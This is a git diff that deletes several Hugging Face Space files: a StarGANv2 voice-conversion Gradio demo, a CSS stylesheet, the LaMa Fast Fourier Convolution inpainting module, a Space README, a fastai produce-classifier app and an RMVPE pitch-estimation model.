starganv2.style_encoder(mel_tensor.unsqueeze(1), label) - reference_embeddings[key] = (ref, label) - - return reference_embeddings - -F0_model = JDCNet(num_class=1, seq_len=192) -params = paddle.load("Models/bst.pd")['net'] -F0_model.set_state_dict(params) -_ = F0_model.eval() - -import yaml -import paddle - -from yacs.config import CfgNode -from paddlespeech.t2s.models.parallel_wavegan import PWGGenerator - -with open('Vocoder/config.yml') as f: - voc_config = CfgNode(yaml.safe_load(f)) -voc_config["generator_params"].pop("upsample_net") -voc_config["generator_params"]["upsample_scales"] = voc_config["generator_params"].pop("upsample_params")["upsample_scales"] -vocoder = PWGGenerator(**voc_config["generator_params"]) -vocoder.remove_weight_norm() -vocoder.eval() -vocoder.set_state_dict(paddle.load('Vocoder/checkpoint-400000steps.pd')) - -model_path = 'Models/vc_ema.pd' - -with open('Models/config.yml') as f: - starganv2_config = yaml.safe_load(f) -starganv2 = build_model(model_params=starganv2_config["model_params"]) -params = paddle.load(model_path) -params = params['model_ema'] -_ = [starganv2[key].set_state_dict(params[key]) for key in starganv2] -_ = [starganv2[key].eval() for key in starganv2] -starganv2.style_encoder = starganv2.style_encoder -starganv2.mapping_network = starganv2.mapping_network -starganv2.generator = starganv2.generator - -# Compute speakers' styles under the Demo directory -speaker_dicts = {} -selected_speakers = [273, 259, 258, 243, 254, 244, 236, 233, 230, 228] -for s in selected_speakers: - k = s - speaker_dicts['p' + str(s)] = ('Demo/VCTK-corpus/p' + str(k) + '/p' + str(k) + '_023.wav', speakers.index(s)) - -reference_embeddings = compute_style(speaker_dicts) - -examples = [['Demo/VCTK-corpus/p243/p243_023.wav', 'p236'], ['Demo/VCTK-corpus/p236/p236_023.wav', 'p243']] - - -def app(wav_path, speaker_id): - audio, _ = librosa.load(wav_path, sr=24000) - audio = audio / np.max(np.abs(audio)) - audio.dtype = np.float32 - source = 
preprocess(audio) - ref = reference_embeddings[speaker_id][0] - - with paddle.no_grad(): - f0_feat = F0_model.get_feature_GAN(source.unsqueeze(1)) - out = starganv2.generator(source.unsqueeze(1), ref, F0=f0_feat) - - c = out.transpose([0,1,3,2]).squeeze() - y_out = vocoder.inference(c) - y_out = y_out.reshape([-1]) - - return (24000, y_out.numpy()) - -title="StarGANv2 Voice Conversion" -description="Gradio Demo for voice conversion using paddlepaddle. " - -iface = gr.Interface(app, [gr.inputs.Audio(source="microphone", type="filepath"), - gr.inputs.Radio(list(speaker_dicts.keys()), type="value", default='p228', label='speaker id')], - "audio", title=title, description=description, examples=examples) - -iface.launch() diff --git a/spaces/ICML2022/ICML2022_papers/style.css b/spaces/ICML2022/ICML2022_papers/style.css deleted file mode 100644 index e2b871457d13980ddfbbc35bf5da02a75ece292e..0000000000000000000000000000000000000000 --- a/spaces/ICML2022/ICML2022_papers/style.css +++ /dev/null @@ -1,22 +0,0 @@ -h1 { - text-align: center; -} -table a { - background-color: transparent; - color: #58a6ff; - text-decoration: none; -} -a:active, -a:hover { - outline-width: 0; -} -a:hover { - text-decoration: underline; -} -table, th, td { - border: 1px solid; -} -img#visitor-badge { - display: block; - margin: auto; -} diff --git a/spaces/InpaintAI/Inpaint-Anything/third_party/lama/saicinpainting/training/modules/ffc.py b/spaces/InpaintAI/Inpaint-Anything/third_party/lama/saicinpainting/training/modules/ffc.py deleted file mode 100644 index 2f8aeb1411fc1537916275fd3243706cc74b8d3c..0000000000000000000000000000000000000000 --- a/spaces/InpaintAI/Inpaint-Anything/third_party/lama/saicinpainting/training/modules/ffc.py +++ /dev/null @@ -1,433 +0,0 @@ -# Fast Fourier Convolution NeurIPS 2020 -# original implementation https://github.com/pkumivision/FFC/blob/main/model_zoo/ffc.py -# paper https://proceedings.neurips.cc/paper/2020/file/2fd5d41ec6cfab47e32164d5624269b1-Paper.pdf - 
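
The module below implements Fast Fourier Convolution: its `FourierUnit` takes a real FFT of the feature map, treats the real and imaginary parts as ordinary channels, mixes them with a 1x1 convolution, and inverts the transform. A minimal NumPy sketch of that core step (illustrative only — the actual file does this with `torch.fft.rfftn`/`irfftn` and a learned `Conv2d`):

```python
import numpy as np

# Sketch of the FFC spectral transform: channel mixing applied in the
# frequency domain. `weight` plays the role of the 1x1 conv kernel that
# FourierUnit learns; here it is just a fixed (2c, 2c) matrix.
def spectral_mix(x: np.ndarray, weight: np.ndarray) -> np.ndarray:
    """x: (c, h, w) real feature map; weight: (2c, 2c) mixing matrix."""
    c, h, w = x.shape
    f = np.fft.rfft2(x, axes=(-2, -1))             # (c, h, w//2+1), complex
    feat = np.concatenate([f.real, f.imag], 0)     # (2c, h, w//2+1), real
    mixed = np.einsum("oc,chw->ohw", weight, feat) # 1x1 "conv" in spectrum
    real, imag = mixed[:c], mixed[c:]
    return np.fft.irfft2(real + 1j * imag, s=(h, w), axes=(-2, -1))
```

With an identity `weight` the round trip reproduces the input exactly, which is a handy sanity check; a learned weight instead mixes every spatial location's spectrum, giving the image-wide receptive field the FFC paper relies on.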
-import numpy as np -import torch -import torch.nn as nn -import torch.nn.functional as F - -from saicinpainting.training.modules.base import get_activation, BaseDiscriminator -from saicinpainting.training.modules.spatial_transform import LearnableSpatialTransformWrapper -from saicinpainting.training.modules.squeeze_excitation import SELayer -from saicinpainting.utils import get_shape - - -class FFCSE_block(nn.Module): - - def __init__(self, channels, ratio_g): - super(FFCSE_block, self).__init__() - in_cg = int(channels * ratio_g) - in_cl = channels - in_cg - r = 16 - - self.avgpool = nn.AdaptiveAvgPool2d((1, 1)) - self.conv1 = nn.Conv2d(channels, channels // r, - kernel_size=1, bias=True) - self.relu1 = nn.ReLU(inplace=True) - self.conv_a2l = None if in_cl == 0 else nn.Conv2d( - channels // r, in_cl, kernel_size=1, bias=True) - self.conv_a2g = None if in_cg == 0 else nn.Conv2d( - channels // r, in_cg, kernel_size=1, bias=True) - self.sigmoid = nn.Sigmoid() - - def forward(self, x): - x = x if type(x) is tuple else (x, 0) - id_l, id_g = x - - x = id_l if type(id_g) is int else torch.cat([id_l, id_g], dim=1) - x = self.avgpool(x) - x = self.relu1(self.conv1(x)) - - x_l = 0 if self.conv_a2l is None else id_l * \ - self.sigmoid(self.conv_a2l(x)) - x_g = 0 if self.conv_a2g is None else id_g * \ - self.sigmoid(self.conv_a2g(x)) - return x_l, x_g - - -class FourierUnit(nn.Module): - - def __init__(self, in_channels, out_channels, groups=1, spatial_scale_factor=None, spatial_scale_mode='bilinear', - spectral_pos_encoding=False, use_se=False, se_kwargs=None, ffc3d=False, fft_norm='ortho'): - # bn_layer not used - super(FourierUnit, self).__init__() - self.groups = groups - - self.conv_layer = torch.nn.Conv2d(in_channels=in_channels * 2 + (2 if spectral_pos_encoding else 0), - out_channels=out_channels * 2, - kernel_size=1, stride=1, padding=0, groups=self.groups, bias=False) - self.bn = torch.nn.BatchNorm2d(out_channels * 2) - self.relu = torch.nn.ReLU(inplace=True) - - # 
squeeze and excitation block - self.use_se = use_se - if use_se: - if se_kwargs is None: - se_kwargs = {} - self.se = SELayer(self.conv_layer.in_channels, **se_kwargs) - - self.spatial_scale_factor = spatial_scale_factor - self.spatial_scale_mode = spatial_scale_mode - self.spectral_pos_encoding = spectral_pos_encoding - self.ffc3d = ffc3d - self.fft_norm = fft_norm - - def forward(self, x): - batch = x.shape[0] - - if self.spatial_scale_factor is not None: - orig_size = x.shape[-2:] - x = F.interpolate(x, scale_factor=self.spatial_scale_factor, mode=self.spatial_scale_mode, align_corners=False) - - r_size = x.size() - # (batch, c, h, w/2+1, 2) - fft_dim = (-3, -2, -1) if self.ffc3d else (-2, -1) - ffted = torch.fft.rfftn(x, dim=fft_dim, norm=self.fft_norm) - ffted = torch.stack((ffted.real, ffted.imag), dim=-1) - ffted = ffted.permute(0, 1, 4, 2, 3).contiguous() # (batch, c, 2, h, w/2+1) - ffted = ffted.view((batch, -1,) + ffted.size()[3:]) - - if self.spectral_pos_encoding: - height, width = ffted.shape[-2:] - coords_vert = torch.linspace(0, 1, height)[None, None, :, None].expand(batch, 1, height, width).to(ffted) - coords_hor = torch.linspace(0, 1, width)[None, None, None, :].expand(batch, 1, height, width).to(ffted) - ffted = torch.cat((coords_vert, coords_hor, ffted), dim=1) - - if self.use_se: - ffted = self.se(ffted) - - ffted = self.conv_layer(ffted) # (batch, c*2, h, w/2+1) - ffted = self.relu(self.bn(ffted)) - - ffted = ffted.view((batch, -1, 2,) + ffted.size()[2:]).permute( - 0, 1, 3, 4, 2).contiguous() # (batch,c, t, h, w/2+1, 2) - ffted = torch.complex(ffted[..., 0], ffted[..., 1]) - - ifft_shape_slice = x.shape[-3:] if self.ffc3d else x.shape[-2:] - output = torch.fft.irfftn(ffted, s=ifft_shape_slice, dim=fft_dim, norm=self.fft_norm) - - if self.spatial_scale_factor is not None: - output = F.interpolate(output, size=orig_size, mode=self.spatial_scale_mode, align_corners=False) - - return output - - -class SpectralTransform(nn.Module): - - def 
__init__(self, in_channels, out_channels, stride=1, groups=1, enable_lfu=True, **fu_kwargs): - # bn_layer not used - super(SpectralTransform, self).__init__() - self.enable_lfu = enable_lfu - if stride == 2: - self.downsample = nn.AvgPool2d(kernel_size=(2, 2), stride=2) - else: - self.downsample = nn.Identity() - - self.stride = stride - self.conv1 = nn.Sequential( - nn.Conv2d(in_channels, out_channels // - 2, kernel_size=1, groups=groups, bias=False), - nn.BatchNorm2d(out_channels // 2), - nn.ReLU(inplace=True) - ) - self.fu = FourierUnit( - out_channels // 2, out_channels // 2, groups, **fu_kwargs) - if self.enable_lfu: - self.lfu = FourierUnit( - out_channels // 2, out_channels // 2, groups) - self.conv2 = torch.nn.Conv2d( - out_channels // 2, out_channels, kernel_size=1, groups=groups, bias=False) - - def forward(self, x): - - x = self.downsample(x) - x = self.conv1(x) - output = self.fu(x) - - if self.enable_lfu: - n, c, h, w = x.shape - split_no = 2 - split_s = h // split_no - xs = torch.cat(torch.split( - x[:, :c // 4], split_s, dim=-2), dim=1).contiguous() - xs = torch.cat(torch.split(xs, split_s, dim=-1), - dim=1).contiguous() - xs = self.lfu(xs) - xs = xs.repeat(1, 1, split_no, split_no).contiguous() - else: - xs = 0 - - output = self.conv2(x + output + xs) - - return output - - -class FFC(nn.Module): - - def __init__(self, in_channels, out_channels, kernel_size, - ratio_gin, ratio_gout, stride=1, padding=0, - dilation=1, groups=1, bias=False, enable_lfu=True, - padding_type='reflect', gated=False, **spectral_kwargs): - super(FFC, self).__init__() - - assert stride == 1 or stride == 2, "Stride should be 1 or 2." 
- self.stride = stride - - in_cg = int(in_channels * ratio_gin) - in_cl = in_channels - in_cg - out_cg = int(out_channels * ratio_gout) - out_cl = out_channels - out_cg - #groups_g = 1 if groups == 1 else int(groups * ratio_gout) - #groups_l = 1 if groups == 1 else groups - groups_g - - self.ratio_gin = ratio_gin - self.ratio_gout = ratio_gout - self.global_in_num = in_cg - - module = nn.Identity if in_cl == 0 or out_cl == 0 else nn.Conv2d - self.convl2l = module(in_cl, out_cl, kernel_size, - stride, padding, dilation, groups, bias, padding_mode=padding_type) - module = nn.Identity if in_cl == 0 or out_cg == 0 else nn.Conv2d - self.convl2g = module(in_cl, out_cg, kernel_size, - stride, padding, dilation, groups, bias, padding_mode=padding_type) - module = nn.Identity if in_cg == 0 or out_cl == 0 else nn.Conv2d - self.convg2l = module(in_cg, out_cl, kernel_size, - stride, padding, dilation, groups, bias, padding_mode=padding_type) - module = nn.Identity if in_cg == 0 or out_cg == 0 else SpectralTransform - self.convg2g = module( - in_cg, out_cg, stride, 1 if groups == 1 else groups // 2, enable_lfu, **spectral_kwargs) - - self.gated = gated - module = nn.Identity if in_cg == 0 or out_cl == 0 or not self.gated else nn.Conv2d - self.gate = module(in_channels, 2, 1) - - def forward(self, x): - x_l, x_g = x if type(x) is tuple else (x, 0) - out_xl, out_xg = 0, 0 - - if self.gated: - total_input_parts = [x_l] - if torch.is_tensor(x_g): - total_input_parts.append(x_g) - total_input = torch.cat(total_input_parts, dim=1) - - gates = torch.sigmoid(self.gate(total_input)) - g2l_gate, l2g_gate = gates.chunk(2, dim=1) - else: - g2l_gate, l2g_gate = 1, 1 - - if self.ratio_gout != 1: - out_xl = self.convl2l(x_l) + self.convg2l(x_g) * g2l_gate - if self.ratio_gout != 0: - out_xg = self.convl2g(x_l) * l2g_gate + self.convg2g(x_g) - - return out_xl, out_xg - - -class FFC_BN_ACT(nn.Module): - - def __init__(self, in_channels, out_channels, - kernel_size, ratio_gin, ratio_gout, - 
stride=1, padding=0, dilation=1, groups=1, bias=False, - norm_layer=nn.BatchNorm2d, activation_layer=nn.Identity, - padding_type='reflect', - enable_lfu=True, **kwargs): - super(FFC_BN_ACT, self).__init__() - self.ffc = FFC(in_channels, out_channels, kernel_size, - ratio_gin, ratio_gout, stride, padding, dilation, - groups, bias, enable_lfu, padding_type=padding_type, **kwargs) - lnorm = nn.Identity if ratio_gout == 1 else norm_layer - gnorm = nn.Identity if ratio_gout == 0 else norm_layer - global_channels = int(out_channels * ratio_gout) - self.bn_l = lnorm(out_channels - global_channels) - self.bn_g = gnorm(global_channels) - - lact = nn.Identity if ratio_gout == 1 else activation_layer - gact = nn.Identity if ratio_gout == 0 else activation_layer - self.act_l = lact(inplace=True) - self.act_g = gact(inplace=True) - - def forward(self, x): - x_l, x_g = self.ffc(x) - x_l = self.act_l(self.bn_l(x_l)) - x_g = self.act_g(self.bn_g(x_g)) - return x_l, x_g - - -class FFCResnetBlock(nn.Module): - def __init__(self, dim, padding_type, norm_layer, activation_layer=nn.ReLU, dilation=1, - spatial_transform_kwargs=None, inline=False, **conv_kwargs): - super().__init__() - self.conv1 = FFC_BN_ACT(dim, dim, kernel_size=3, padding=dilation, dilation=dilation, - norm_layer=norm_layer, - activation_layer=activation_layer, - padding_type=padding_type, - **conv_kwargs) - self.conv2 = FFC_BN_ACT(dim, dim, kernel_size=3, padding=dilation, dilation=dilation, - norm_layer=norm_layer, - activation_layer=activation_layer, - padding_type=padding_type, - **conv_kwargs) - if spatial_transform_kwargs is not None: - self.conv1 = LearnableSpatialTransformWrapper(self.conv1, **spatial_transform_kwargs) - self.conv2 = LearnableSpatialTransformWrapper(self.conv2, **spatial_transform_kwargs) - self.inline = inline - - def forward(self, x): - if self.inline: - x_l, x_g = x[:, :-self.conv1.ffc.global_in_num], x[:, -self.conv1.ffc.global_in_num:] - else: - x_l, x_g = x if type(x) is tuple else (x, 
0) - - id_l, id_g = x_l, x_g - - x_l, x_g = self.conv1((x_l, x_g)) - x_l, x_g = self.conv2((x_l, x_g)) - - x_l, x_g = id_l + x_l, id_g + x_g - out = x_l, x_g - if self.inline: - out = torch.cat(out, dim=1) - return out - - -class ConcatTupleLayer(nn.Module): - def forward(self, x): - assert isinstance(x, tuple) - x_l, x_g = x - assert torch.is_tensor(x_l) or torch.is_tensor(x_g) - if not torch.is_tensor(x_g): - return x_l - return torch.cat(x, dim=1) - - -class FFCResNetGenerator(nn.Module): - def __init__(self, input_nc, output_nc, ngf=64, n_downsampling=3, n_blocks=9, norm_layer=nn.BatchNorm2d, - padding_type='reflect', activation_layer=nn.ReLU, - up_norm_layer=nn.BatchNorm2d, up_activation=nn.ReLU(True), - init_conv_kwargs={}, downsample_conv_kwargs={}, resnet_conv_kwargs={}, - spatial_transform_layers=None, spatial_transform_kwargs={}, - add_out_act=True, max_features=1024, out_ffc=False, out_ffc_kwargs={}): - assert (n_blocks >= 0) - super().__init__() - - model = [nn.ReflectionPad2d(3), - FFC_BN_ACT(input_nc, ngf, kernel_size=7, padding=0, norm_layer=norm_layer, - activation_layer=activation_layer, **init_conv_kwargs)] - - ### downsample - for i in range(n_downsampling): - mult = 2 ** i - if i == n_downsampling - 1: - cur_conv_kwargs = dict(downsample_conv_kwargs) - cur_conv_kwargs['ratio_gout'] = resnet_conv_kwargs.get('ratio_gin', 0) - else: - cur_conv_kwargs = downsample_conv_kwargs - model += [FFC_BN_ACT(min(max_features, ngf * mult), - min(max_features, ngf * mult * 2), - kernel_size=3, stride=2, padding=1, - norm_layer=norm_layer, - activation_layer=activation_layer, - **cur_conv_kwargs)] - - mult = 2 ** n_downsampling - feats_num_bottleneck = min(max_features, ngf * mult) - - ### resnet blocks - for i in range(n_blocks): - cur_resblock = FFCResnetBlock(feats_num_bottleneck, padding_type=padding_type, activation_layer=activation_layer, - norm_layer=norm_layer, **resnet_conv_kwargs) - if spatial_transform_layers is not None and i in 
spatial_transform_layers: - cur_resblock = LearnableSpatialTransformWrapper(cur_resblock, **spatial_transform_kwargs) - model += [cur_resblock] - - model += [ConcatTupleLayer()] - - ### upsample - for i in range(n_downsampling): - mult = 2 ** (n_downsampling - i) - model += [nn.ConvTranspose2d(min(max_features, ngf * mult), - min(max_features, int(ngf * mult / 2)), - kernel_size=3, stride=2, padding=1, output_padding=1), - up_norm_layer(min(max_features, int(ngf * mult / 2))), - up_activation] - - if out_ffc: - model += [FFCResnetBlock(ngf, padding_type=padding_type, activation_layer=activation_layer, - norm_layer=norm_layer, inline=True, **out_ffc_kwargs)] - - model += [nn.ReflectionPad2d(3), - nn.Conv2d(ngf, output_nc, kernel_size=7, padding=0)] - if add_out_act: - model.append(get_activation('tanh' if add_out_act is True else add_out_act)) - self.model = nn.Sequential(*model) - - def forward(self, input): - return self.model(input) - - -class FFCNLayerDiscriminator(BaseDiscriminator): - def __init__(self, input_nc, ndf=64, n_layers=3, norm_layer=nn.BatchNorm2d, max_features=512, - init_conv_kwargs={}, conv_kwargs={}): - super().__init__() - self.n_layers = n_layers - - def _act_ctor(inplace=True): - return nn.LeakyReLU(negative_slope=0.2, inplace=inplace) - - kw = 3 - padw = int(np.ceil((kw-1.0)/2)) - sequence = [[FFC_BN_ACT(input_nc, ndf, kernel_size=kw, padding=padw, norm_layer=norm_layer, - activation_layer=_act_ctor, **init_conv_kwargs)]] - - nf = ndf - for n in range(1, n_layers): - nf_prev = nf - nf = min(nf * 2, max_features) - - cur_model = [ - FFC_BN_ACT(nf_prev, nf, - kernel_size=kw, stride=2, padding=padw, - norm_layer=norm_layer, - activation_layer=_act_ctor, - **conv_kwargs) - ] - sequence.append(cur_model) - - nf_prev = nf - nf = min(nf * 2, 512) - - cur_model = [ - FFC_BN_ACT(nf_prev, nf, - kernel_size=kw, stride=1, padding=padw, - norm_layer=norm_layer, - activation_layer=lambda *args, **kwargs: nn.LeakyReLU(*args, negative_slope=0.2, **kwargs), 
- **conv_kwargs), - ConcatTupleLayer() - ] - sequence.append(cur_model) - - sequence += [[nn.Conv2d(nf, 1, kernel_size=kw, stride=1, padding=padw)]] - - for n in range(len(sequence)): - setattr(self, 'model'+str(n), nn.Sequential(*sequence[n])) - - def get_all_activations(self, x): - res = [x] - for n in range(self.n_layers + 2): - model = getattr(self, 'model' + str(n)) - res.append(model(res[-1])) - return res[1:] - - def forward(self, x): - act = self.get_all_activations(x) - feats = [] - for out in act[:-1]: - if isinstance(out, tuple): - if torch.is_tensor(out[1]): - out = torch.cat(out, dim=1) - else: - out = out[0] - feats.append(out) - return act[-1], feats diff --git a/spaces/JUNGU/Talk2Carnegie/README.md b/spaces/JUNGU/Talk2Carnegie/README.md deleted file mode 100644 index 7903b155e84daf8ecc150f2c64f18aae360ff3ee..0000000000000000000000000000000000000000 --- a/spaces/JUNGU/Talk2Carnegie/README.md +++ /dev/null @@ -1,14 +0,0 @@ ---- -title: Talktosayno -emoji: 📉 -colorFrom: green -colorTo: pink -sdk: gradio -sdk_version: 3.34.0 -app_file: app.py -pinned: false -license: openrail -duplicated_from: JUNGU/talktosayno ---- - -Check out the configuration reference at https://huggingface.co/docs/hub/spaces-config-reference diff --git a/spaces/Jack-Ahan/fruit-vegetable-classifier/app.py b/spaces/Jack-Ahan/fruit-vegetable-classifier/app.py deleted file mode 100644 index 50b0c16e02bca3a872d3644621ebb1881281ff35..0000000000000000000000000000000000000000 --- a/spaces/Jack-Ahan/fruit-vegetable-classifier/app.py +++ /dev/null @@ -1,17 +0,0 @@ -from fastai.vision.all import * -import gradio as gr - -learn=load_learner("model.pkl") - -labels=learn.dls.vocab -def sample_predict(img): - print(img) - img = PILImage.create(img) - pred,pred_idx,probs=learn.predict(img) - return {labels[i]: float(probs[i]) for i in range(len(labels))} - -intf=gr.Interface(fn=sample_predict, - inputs=gr.components.Image(shape=(256, 256)), - outputs=gr.components.Label()) - -intf.launch() \ No 
newline at end of file diff --git a/spaces/Jamel887/Rvc-tio887/rmvpe.py b/spaces/Jamel887/Rvc-tio887/rmvpe.py deleted file mode 100644 index 3ad346141340e03bdbaa20121e1ed435bb3da57a..0000000000000000000000000000000000000000 --- a/spaces/Jamel887/Rvc-tio887/rmvpe.py +++ /dev/null @@ -1,432 +0,0 @@ -import sys, torch, numpy as np, traceback, pdb -import torch.nn as nn -from time import time as ttime -import torch.nn.functional as F - - -class BiGRU(nn.Module): - def __init__(self, input_features, hidden_features, num_layers): - super(BiGRU, self).__init__() - self.gru = nn.GRU( - input_features, - hidden_features, - num_layers=num_layers, - batch_first=True, - bidirectional=True, - ) - - def forward(self, x): - return self.gru(x)[0] - - -class ConvBlockRes(nn.Module): - def __init__(self, in_channels, out_channels, momentum=0.01): - super(ConvBlockRes, self).__init__() - self.conv = nn.Sequential( - nn.Conv2d( - in_channels=in_channels, - out_channels=out_channels, - kernel_size=(3, 3), - stride=(1, 1), - padding=(1, 1), - bias=False, - ), - nn.BatchNorm2d(out_channels, momentum=momentum), - nn.ReLU(), - nn.Conv2d( - in_channels=out_channels, - out_channels=out_channels, - kernel_size=(3, 3), - stride=(1, 1), - padding=(1, 1), - bias=False, - ), - nn.BatchNorm2d(out_channels, momentum=momentum), - nn.ReLU(), - ) - if in_channels != out_channels: - self.shortcut = nn.Conv2d(in_channels, out_channels, (1, 1)) - self.is_shortcut = True - else: - self.is_shortcut = False - - def forward(self, x): - if self.is_shortcut: - return self.conv(x) + self.shortcut(x) - else: - return self.conv(x) + x - - -class Encoder(nn.Module): - def __init__( - self, - in_channels, - in_size, - n_encoders, - kernel_size, - n_blocks, - out_channels=16, - momentum=0.01, - ): - super(Encoder, self).__init__() - self.n_encoders = n_encoders - self.bn = nn.BatchNorm2d(in_channels, momentum=momentum) - self.layers = nn.ModuleList() - self.latent_channels = [] - for i in range(self.n_encoders): - 
self.layers.append( - ResEncoderBlock( - in_channels, out_channels, kernel_size, n_blocks, momentum=momentum - ) - ) - self.latent_channels.append([out_channels, in_size]) - in_channels = out_channels - out_channels *= 2 - in_size //= 2 - self.out_size = in_size - self.out_channel = out_channels - - def forward(self, x): - concat_tensors = [] - x = self.bn(x) - for i in range(self.n_encoders): - _, x = self.layers[i](x) - concat_tensors.append(_) - return x, concat_tensors - - -class ResEncoderBlock(nn.Module): - def __init__( - self, in_channels, out_channels, kernel_size, n_blocks=1, momentum=0.01 - ): - super(ResEncoderBlock, self).__init__() - self.n_blocks = n_blocks - self.conv = nn.ModuleList() - self.conv.append(ConvBlockRes(in_channels, out_channels, momentum)) - for i in range(n_blocks - 1): - self.conv.append(ConvBlockRes(out_channels, out_channels, momentum)) - self.kernel_size = kernel_size - if self.kernel_size is not None: - self.pool = nn.AvgPool2d(kernel_size=kernel_size) - - def forward(self, x): - for i in range(self.n_blocks): - x = self.conv[i](x) - if self.kernel_size is not None: - return x, self.pool(x) - else: - return x - - -class Intermediate(nn.Module): # - def __init__(self, in_channels, out_channels, n_inters, n_blocks, momentum=0.01): - super(Intermediate, self).__init__() - self.n_inters = n_inters - self.layers = nn.ModuleList() - self.layers.append( - ResEncoderBlock(in_channels, out_channels, None, n_blocks, momentum) - ) - for i in range(self.n_inters - 1): - self.layers.append( - ResEncoderBlock(out_channels, out_channels, None, n_blocks, momentum) - ) - - def forward(self, x): - for i in range(self.n_inters): - x = self.layers[i](x) - return x - - -class ResDecoderBlock(nn.Module): - def __init__(self, in_channels, out_channels, stride, n_blocks=1, momentum=0.01): - super(ResDecoderBlock, self).__init__() - out_padding = (0, 1) if stride == (1, 2) else (1, 1) - self.n_blocks = n_blocks - self.conv1 = nn.Sequential( - 
nn.ConvTranspose2d( - in_channels=in_channels, - out_channels=out_channels, - kernel_size=(3, 3), - stride=stride, - padding=(1, 1), - output_padding=out_padding, - bias=False, - ), - nn.BatchNorm2d(out_channels, momentum=momentum), - nn.ReLU(), - ) - self.conv2 = nn.ModuleList() - self.conv2.append(ConvBlockRes(out_channels * 2, out_channels, momentum)) - for i in range(n_blocks - 1): - self.conv2.append(ConvBlockRes(out_channels, out_channels, momentum)) - - def forward(self, x, concat_tensor): - x = self.conv1(x) - x = torch.cat((x, concat_tensor), dim=1) - for i in range(self.n_blocks): - x = self.conv2[i](x) - return x - - -class Decoder(nn.Module): - def __init__(self, in_channels, n_decoders, stride, n_blocks, momentum=0.01): - super(Decoder, self).__init__() - self.layers = nn.ModuleList() - self.n_decoders = n_decoders - for i in range(self.n_decoders): - out_channels = in_channels // 2 - self.layers.append( - ResDecoderBlock(in_channels, out_channels, stride, n_blocks, momentum) - ) - in_channels = out_channels - - def forward(self, x, concat_tensors): - for i in range(self.n_decoders): - x = self.layers[i](x, concat_tensors[-1 - i]) - return x - - -class DeepUnet(nn.Module): - def __init__( - self, - kernel_size, - n_blocks, - en_de_layers=5, - inter_layers=4, - in_channels=1, - en_out_channels=16, - ): - super(DeepUnet, self).__init__() - self.encoder = Encoder( - in_channels, 128, en_de_layers, kernel_size, n_blocks, en_out_channels - ) - self.intermediate = Intermediate( - self.encoder.out_channel // 2, - self.encoder.out_channel, - inter_layers, - n_blocks, - ) - self.decoder = Decoder( - self.encoder.out_channel, en_de_layers, kernel_size, n_blocks - ) - - def forward(self, x): - x, concat_tensors = self.encoder(x) - x = self.intermediate(x) - x = self.decoder(x, concat_tensors) - return x - - -class E2E(nn.Module): - def __init__( - self, - n_blocks, - n_gru, - kernel_size, - en_de_layers=5, - inter_layers=4, - in_channels=1, - en_out_channels=16, 
- ): - super(E2E, self).__init__() - self.unet = DeepUnet( - kernel_size, - n_blocks, - en_de_layers, - inter_layers, - in_channels, - en_out_channels, - ) - self.cnn = nn.Conv2d(en_out_channels, 3, (3, 3), padding=(1, 1)) - if n_gru: - self.fc = nn.Sequential( - BiGRU(3 * 128, 256, n_gru), - nn.Linear(512, 360), - nn.Dropout(0.25), - nn.Sigmoid(), - ) - else: - self.fc = nn.Sequential( - nn.Linear(3 * N_MELS, N_CLASS), nn.Dropout(0.25), nn.Sigmoid() - ) - - def forward(self, mel): - mel = mel.transpose(-1, -2).unsqueeze(1) - x = self.cnn(self.unet(mel)).transpose(1, 2).flatten(-2) - x = self.fc(x) - return x - - -from librosa.filters import mel - - -class MelSpectrogram(torch.nn.Module): - def __init__( - self, - is_half, - n_mel_channels, - sampling_rate, - win_length, - hop_length, - n_fft=None, - mel_fmin=0, - mel_fmax=None, - clamp=1e-5, - ): - super().__init__() - n_fft = win_length if n_fft is None else n_fft - self.hann_window = {} - mel_basis = mel( - sr=sampling_rate, - n_fft=n_fft, - n_mels=n_mel_channels, - fmin=mel_fmin, - fmax=mel_fmax, - htk=True, - ) - mel_basis = torch.from_numpy(mel_basis).float() - self.register_buffer("mel_basis", mel_basis) - self.n_fft = win_length if n_fft is None else n_fft - self.hop_length = hop_length - self.win_length = win_length - self.sampling_rate = sampling_rate - self.n_mel_channels = n_mel_channels - self.clamp = clamp - self.is_half = is_half - - def forward(self, audio, keyshift=0, speed=1, center=True): - factor = 2 ** (keyshift / 12) - n_fft_new = int(np.round(self.n_fft * factor)) - win_length_new = int(np.round(self.win_length * factor)) - hop_length_new = int(np.round(self.hop_length * speed)) - keyshift_key = str(keyshift) + "_" + str(audio.device) - if keyshift_key not in self.hann_window: - self.hann_window[keyshift_key] = torch.hann_window(win_length_new).to( - audio.device - ) - fft = torch.stft( - audio, - n_fft=n_fft_new, - hop_length=hop_length_new, - win_length=win_length_new, - 
window=self.hann_window[keyshift_key], - center=center, - return_complex=True, - ) - magnitude = torch.sqrt(fft.real.pow(2) + fft.imag.pow(2)) - if keyshift != 0: - size = self.n_fft // 2 + 1 - resize = magnitude.size(1) - if resize < size: - magnitude = F.pad(magnitude, (0, 0, 0, size - resize)) - magnitude = magnitude[:, :size, :] * self.win_length / win_length_new - mel_output = torch.matmul(self.mel_basis, magnitude) - if self.is_half == True: - mel_output = mel_output.half() - log_mel_spec = torch.log(torch.clamp(mel_output, min=self.clamp)) - return log_mel_spec - - -class RMVPE: - def __init__(self, model_path, is_half, device=None): - self.resample_kernel = {} - model = E2E(4, 1, (2, 2)) - ckpt = torch.load(model_path, map_location="cpu") - model.load_state_dict(ckpt) - model.eval() - if is_half == True: - model = model.half() - self.model = model - self.resample_kernel = {} - self.is_half = is_half - if device is None: - device = "cuda" if torch.cuda.is_available() else "cpu" - self.device = device - self.mel_extractor = MelSpectrogram( - is_half, 128, 16000, 1024, 160, None, 30, 8000 - ).to(device) - self.model = self.model.to(device) - cents_mapping = 20 * np.arange(360) + 1997.3794084376191 - self.cents_mapping = np.pad(cents_mapping, (4, 4)) # 368 - - def mel2hidden(self, mel): - with torch.no_grad(): - n_frames = mel.shape[-1] - mel = F.pad( - mel, (0, 32 * ((n_frames - 1) // 32 + 1) - n_frames), mode="reflect" - ) - hidden = self.model(mel) - return hidden[:, :n_frames] - - def decode(self, hidden, thred=0.03): - cents_pred = self.to_local_average_cents(hidden, thred=thred) - f0 = 10 * (2 ** (cents_pred / 1200)) - f0[f0 == 10] = 0 - # f0 = np.array([10 * (2 ** (cent_pred / 1200)) if cent_pred else 0 for cent_pred in cents_pred]) - return f0 - - def infer_from_audio(self, audio, thred=0.03): - audio = torch.from_numpy(audio).float().to(self.device).unsqueeze(0) - # torch.cuda.synchronize() - # t0=ttime() - mel = self.mel_extractor(audio, center=True) 
